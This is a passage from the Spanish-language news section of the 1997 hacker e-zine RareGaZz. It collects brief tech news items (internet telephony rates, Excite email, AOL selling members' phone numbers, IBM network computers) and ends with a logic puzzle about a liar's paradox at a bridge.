 servidor de red que contacta a otro servidor para completar la llamada. Las
 tarifas son espectacularmente bajas: 8 centavos de dolar el minuto nacional,
 18 centavos internacional.
 De ahora en adelante ya saben a quienes culpar cuando el trafico en internet
 sea pesado :)

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 El primer Torneo de QUAKE para mujeres esta en estos momentos...
 http://www.slamsite.com/aft/

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 Excite (www.excite.com) sera la primera maquina de busqueda en ofrecer un
 servicio gratuito de email. Estaremos checando ese servicio...

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 Un operador de Geocities removio una pagina aparentemente puesta por jovenes
 que contenia las calificaciones de looks y personalidad de unas 152 chicas
 de octavo grado en alguna escuela de Palo Alto CA. La calificacion mas alta
 del look de una chica fue 9 y el mas bajo en personalidad 1/7.

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 La caja TVMessenger de $99 disponible en internet, se conecta al telefono y
 a la television para mostrar en pantalla el Caller ID de cualquier persona
 que llame. Tambien muestra llamadas en espera y mas...

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 El operador de satelites Arabsat dice que no reconsiderara su censura total
 en el canal Telecom de Francia despues de que la estacion francesa transmitio
 una pelicula porno a todo el mundo arabe el sabado haciendo enojar a los
 seguidores del Islam. Un error tecnico (y no un hacker) fue culpado.

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 IBM anuncio dos computadoras de red (network computers) a tan solo $799
 US.dlls cada una.

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 El 31 de Julio American Online empezara a vender los numeros telefonicos de
 sus miembros a compaias de telemarketers.
                       [ que mas puede esperarse de AOL?? ]

 (+) (+) (+) (+) (+) (+)  (+) (+) (+)  (+) (+) (+)  (+) (+) (+)  (+) (+) (+)

 En Los Angeles California un revolucionario invento ha sido creado que
 permite a un auto manejar por las autopistas de esa ciudad sin necesidad
 de chofer.

 (+) (+) (+) (+) (+) (+)  (+) (+) (+)  (+) (+) (+)  (+) (+) (+)  (+) (+) (+)

 El jueves 31 de julio (1997) Dave Foley de NBC radio news iniciara una sesion
 de chat con su publico a las 9:00pm hora de Los Angeles en chat.yahoo.com

 Tal vez nosotros hagamos algo parecido proximamente...

 (+) (+) (+) (+) (+) (+)  (+) (+) (+)  (+) (+) (+)  (+) (+) (+)  (+) (+) (+)

  "El uso de esta seccion sin autorizacion firmada electronicamente con la
   llave pgp de la revista RareGaZz esta estrictamente prohibido."

 (+) (+) (+) (+) (+) (+)  (+) (+) (+)  (+) (+) (+)  (+) (+) (+)  (+) (+) (+) 

        Nosotros tenemos las noticias interesantes...los demas NO!
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                             -=[NotiLOONS]=-
                                +Groovy+
                             +ServerHacker+

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
 **FIN**FIN**FIN**FIN**FIN**FIN**FIN**FIN*FIN**FIN**FIN**FIN**FIN**FIN**FIN**
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

 Un bocado mental...

 - Existe un puente donde para pasar es necesario decir una frase verdadera
   a el jurado mas justo del mundo. Si la frase es verdadera pasaras por el
   puente, si la frase es mentira mueres ahorcado.
   Se sabe de una persona que dijo la frase: `morire ahorcado'.
   Si el jurado lo ahorcaba la frase era verdadera y entonces debia pasar,
   pero si lo dejaban pasar la frase seria mentira y entonces debia morir.
   Para solucionar el conflicto su novia corrio con el juez supremo a 10
   millas de distancia y este le escribio un recado que debia llevar a el
   jurado. La novia llego y el jurado leyo el mensaje:
        " El hombre podra pasar unicamente si la frase que aparece al
          reverso del papel es verdadera. "
   El jurado confundido leyo el reverso del papel y decia:
        " Lo que dice el otro lado del papel es falso. "

   RareGaZz se despide de ustedes preguntandoles...  morira esta persona ?
